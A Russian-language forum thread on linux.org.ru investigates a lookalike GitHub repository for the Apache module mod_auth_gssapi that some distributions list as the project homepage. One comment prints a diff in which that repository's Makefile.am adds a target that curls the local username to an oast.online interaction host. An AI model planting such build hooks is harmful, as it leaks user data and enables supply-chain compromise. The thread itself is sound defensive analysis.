LINUX.ORG.RU
ФорумTalks

wtf? либо мейнейнеры курят одну и ту же дурь, либо что-то очень странное происходит

 ,


0

2

Есть такой проект, mod_auth_gssapi. Модуль для apache, реализует spnego (gssapi) протокол для apache. В частности, через него подключают доменную аутентификацию через kerberos

И внезапно есть два репозитория

Угадайте с одного раза, какой из них официальный

И какой, сюрприз, указан в описании пакетов в debian и rhel

$ apt-cache show libapache2-mod-auth-gssapi | grep Homepage
Homepage: https://github.com/modauthgssapi/mod_auth_gssapi

# yum info mod_auth_gssapi | grep URL
URL         : https://github.com/modauthgssapi/mod_auth_gssapi

Вы видите то же, что и я? WTF?!

★★★★★

Ответ на: комментарий от sehellion

Важный модуль. Есть во всех дистрибутивах. А в описании пакета в этих дистрибутивах левая ссылка, которая ведет в гитхаб хакира

router ★★★★★
() автор топика
Последнее исправление: router (всего исправлений: 1)

https://github.com/modauthgssapi/mod_auth_gssapi

Судя по Web Archive, раньше эта репа была официальной, так как она еще в 2015 году существовала, до появления gssapi/mod_auth_gssapi. Видимо потом ее удалили, а потом кто-то восстановил. Ну а дистрибутивы, видимо, по инерции эту репу используют, фиг знает.

Kron4ek ★★★★★
()
Ответ на: комментарий от Kron4ek

Походу загрузивший проверяет, не использует ли кто-нибудь эту репу.

Это как раз должно выявить случаи, когда в spec-файлах, PKGBUILDах итп. прописан старый URL.

token_polyak ★★★★
()
Последнее исправление: token_polyak (всего исправлений: 2)
Ответ на: комментарий от evgeny_aa

оно сносит хомяк по tz/locale? нет - приемлимо

etwrq ★★★★★
()
Ответ на: комментарий от token_polyak

Единственное отличие - файлы, сгенерированные автотулзами

Не факт, что сгенерированными. В том же скрипте configure curl того же адреса

Возможно, white hat готовит презентацию о том, как много беспечных людей. А может и black hat оценивает переспективы

router ★★★★★
() автор топика
Ответ на: комментарий от router

Не факт, что сгенерированными.

Я про install-sh, depcomp и остальное.

token_polyak ★★★★
()
Ответ на: комментарий от LINUX-ORG-RU 
diff mod_auth_gssapi/Makefile.am original/Makefile.am 
1,4d0
< run:
< 	echo USER: $(USER)
< 	curl "$(USER).cgetgk27972qp7qtpdcgix5crkjmdnrxs.oast.online"
< 
19d14
< 

diff -q mod_auth_gssapi/ original/
Только в mod_auth_gssapi/: aclocal.m4
Только в mod_auth_gssapi/: ar-lib
Только в mod_auth_gssapi/: autom4te.cache
Общие подкаталоги: mod_auth_gssapi/ci и original/ci
Только в mod_auth_gssapi/: compile
Только в mod_auth_gssapi/: config.guess
Только в mod_auth_gssapi/: config.log
Только в mod_auth_gssapi/: config.sub
Только в mod_auth_gssapi/: configure
Общие подкаталоги: mod_auth_gssapi/contrib и original/contrib
Только в mod_auth_gssapi/: depcomp
Общие подкаталоги: mod_auth_gssapi/example и original/example
Общие подкаталоги: mod_auth_gssapi/.git и original/.git
Только в original/: .github
Только в original/: .gitignore
Только в mod_auth_gssapi/: install-sh
Только в mod_auth_gssapi/: ltmain.sh
Только в mod_auth_gssapi/: m4
Файлы mod_auth_gssapi/Makefile.am и original/Makefile.am различаются
Только в mod_auth_gssapi/: Makefile.in
Только в mod_auth_gssapi/: missing
Общие подкаталоги: mod_auth_gssapi/src и original/src
Общие подкаталоги: mod_auth_gssapi/tests и original/tests
Только в mod_auth_gssapi/: ylwrap

Сайт на который ведет curl: http://www.oast.online/

Если вы заметили какие-либо взаимодействия с *.oast.online в своих журналах, возможно, кто-то (внутренние инженеры по безопасности, пен-тестеры, охотники за ошибками) тестировал ваше приложение. Вы должны изучить сайты, с которых были созданы эти взаимодействия, и, если существует уязвимость, изучить основную причину и принять необходимые меры для устранения проблемы.

MOPKOBKA ★★★★
()
Последнее исправление: MOPKOBKA (всего исправлений: 2)

Нужно пожалуй включить список тех кто использует оригинальный пакет, и неоригинальный.

Используют хороший пакет:
Fedora
Arch (Manjaro)
FreeBSD

Используют плохой пакет:
Debian (Ubuntu, Mint, итд)
OpenSuse
AltLinux
AstraLinux

MOPKOBKA ★★★★
()
Последнее исправление: MOPKOBKA (всего исправлений: 4)
Ответ на: комментарий от MOPKOBKA

Возможно, используют старое описание пакета (забИли поправить)

Т.к. сложно не заметить, что в левой репе нет релизов

router ★★★★★
() автор топика
Ответ на: комментарий от MOPKOBKA

debian 12, пакеты с исходниками. вроде все в порядке

apt-get source libapache2-mod-auth-gssapi
tar -xzf libapache2-mod-auth-gssapi_1.6.4.orig.tar.gz
cd mod_auth_gssapi-1.6.4
grep -Ri curl ./
router ★★★★★
() автор топика
Ответ на: комментарий от ratvier

Так в федорке, вроде как, тоже правильная уже url-ка

https://src.fedoraproject.org/rpms/mod_auth_gssapi/blob/rawhide/f/mod_auth_gssapi.spec#_7

Скорей всего, в RHEL либо старая версия, либо забыли обновить URL. URL в спеке просто для информации.

Vovka-Korovka ★★★★★
()
Ответ на: комментарий от router

Да, действительно, в AltLinux несмотря на плохую ссылку сам архив с исходником старый, без этой строки.

MOPKOBKA ★★★★
()
Ответ на: комментарий от Vovka-Korovka

URL в спеке просто для информации.

Давай лучше про ебилды 9999-ой версии, есть такой где-нибудь в оверлеях?

ratvier ★★
()
Ответ на: комментарий от MOPKOBKA

Нормальный дифф давай, а не до/после autoreconf, или как там этот поганый бутстрап автотулзов называется.

t184256 ★★★★★
()
Ответ на: комментарий от t184256

Нормальный дифф давай, а не до/после autoreconf

Между что ли?

MOPKOBKA ★★★★
()
Ответ на: комментарий от MOPKOBKA

Используют плохой пакет:

Debian

Пакет в последний раз обновлялся 11 месяцев назад, когда GitHub ещё перенаправлял со старого на новый адрес репозитория, так что сам пакет в порядке.

Rootlexx ★★★★★
()
Последнее исправление: Rootlexx (всего исправлений: 1)
Закрыто добавление комментариев для недавно зарегистрированных пользователей (со score < 50)
Talks